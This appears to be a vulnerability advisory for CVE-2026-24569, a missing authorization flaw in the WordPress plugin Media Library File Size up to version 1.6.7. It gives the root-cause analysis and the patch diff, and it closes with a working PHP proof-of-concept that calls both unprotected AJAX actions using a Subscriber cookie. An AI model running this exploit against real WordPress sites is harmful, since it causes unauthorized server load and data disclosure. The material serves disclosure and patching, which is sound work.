Atomic Edge analysis of CVE-2026-24569:
The Media Library File Size plugin for WordPress, versions up to and including 1.6.7, contains a missing authorization vulnerability. This flaw allows authenticated attackers with Subscriber-level permissions or higher to trigger administrative functions, leading to unauthorized data access and potential server resource exhaustion.
Atomic Edge research identifies the root cause as a missing capability check within two AJAX handler functions. The vulnerable functions `index()` and `indexCount()` are defined in the main plugin file `media-library-file-size/ss88-media-library-file-size.php`. These functions are hooked to WordPress AJAX actions `wp_ajax_ss88_mlfs_index` and `wp_ajax_ss88_mlfs_indexCount`. The code diff shows that prior to version 1.6.8, lines 100 and 189 respectively, these functions performed no authorization checks before executing their logic.
Exploitation requires an authenticated attacker with any valid WordPress account. The attacker sends a POST request to the standard WordPress AJAX endpoint `/wp-admin/admin-ajax.php`. The request must include the parameter `action` set to either `ss88_mlfs_index` or `ss88_mlfs_indexCount`. No other parameters or a nonce are required. Triggering the `index()` function initiates a resource-intensive file size indexing operation. Triggering `indexCount()` retrieves the total calculated file size stored in the database.
The patch in version 1.6.8 adds an authorization check at the beginning of both vulnerable functions. The fix inserts the line `if(!current_user_can(‘manage_options’)) wp_send_json_error([‘error’ => ‘You need to be an administrator.’]);` before any other logic in the `index()` and `indexCount()` functions. This check ensures only users with the `manage_options` capability, typically Administrators, can execute these functions. The patch also adds a basic security header (`if ( ! defined( ‘ABSPATH’ ) ) exit;`) and updates plugin metadata.
Successful exploitation allows a low-privileged user to perform actions reserved for administrators. Triggering the `index()` function can cause significant server load by forcing a re-indexing of all media library file sizes, potentially leading to a denial-of-service condition. The `indexCount()` function discloses the total file size of the media library, which is sensitive operational data that could aid in further attacks. This constitutes a broken access control issue.
--- a/media-library-file-size/ss88-media-library-file-size.php
+++ b/media-library-file-size/ss88-media-library-file-size.php
@@ -1,17 +1,21 @@
<?php
/*
Plugin Name: Media Library File Size
-Plugin URI: https://ss88.us/plugins/media-library-file-size?utm_source=wordpress&utm_medium=link&utm_campaign=mlfs
+Plugin URI: https://neoboffin.com/plugins/media-library-file-size?utm_source=wordpress&utm_medium=link&utm_campaign=mlfs
Description: Creates a new column in your Media Library to show you the file (and collective images) size of files plus more!
-Version: 1.6.7
-Author: SS88 LLC
-Author URI: https://ss88.us/?utm_source=wordpress&utm_medium=link&utm_campaign=author_mlfs
+Version: 1.6.8
+Author: Neoboffin LLC
+Author URI: https://neoboffin.com/?utm_source=wordpress&utm_medium=link&utm_campaign=author_mlfs
Text Domain: media-library-file-size
+License: GPL2
+License URI: https://www.gnu.org/licenses/gpl-2.0.html
*/
+if ( ! defined( 'ABSPATH' ) ) exit;
+
class SS88_MediaLibraryFileSize {
- protected $version = '1.6.7';
+ protected $version = '1.6.8';
protected $variantJSON = [];
public static function init() {
@@ -100,6 +104,8 @@
function index() {
+ if(!current_user_can('manage_options')) wp_send_json_error(['error' => 'You need to be an administrator.']);
+
set_time_limit(600);
ini_set('max_execution_time', 600);
@@ -189,6 +195,8 @@
function indexCount() {
+ if(!current_user_can('manage_options')) wp_send_json_error(['error' => 'You need to be an administrator.']);
+
global $wpdb;
$TotalMLSize = $wpdb->get_var("SELECT SUM(meta_value) FROM $wpdb->postmeta WHERE meta_key = 'SS88MLFS'");
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-24569 - Media Library File Size <= 1.6.7 - Missing Authorization
<?php
// Configure the target WordPress site URL
$target_url = 'https://vulnerable-site.example.com';
// WordPress AJAX endpoint
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
// Set up cURL for the first vulnerable action
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, 1);
// Target the function that starts the file size indexing
curl_setopt($ch, CURLOPT_POSTFIELDS, 'action=ss88_mlfs_index');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // Disable for testing only
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
// Add WordPress authentication cookies if attacking as a Subscriber
// Replace with a valid logged-in session cookie for the target site
$cookies = 'wordpress_logged_in_xxxx=...';
curl_setopt($ch, CURLOPT_COOKIE, $cookies);
// Execute the request to trigger the unauthorized indexing
$response_index = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
echo "[*] Triggering ss88_mlfs_index...n";
echo " HTTP Code: $http_coden";
echo " Response: $response_indexnn";
// Now target the second vulnerable action to retrieve total file size
curl_setopt($ch, CURLOPT_POSTFIELDS, 'action=ss88_mlfs_indexCount');
$response_count = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
echo "[*] Triggering ss88_mlfs_indexCount...n";
echo " HTTP Code: $http_coden";
echo " Response: $response_countn";
curl_close($ch);
?>
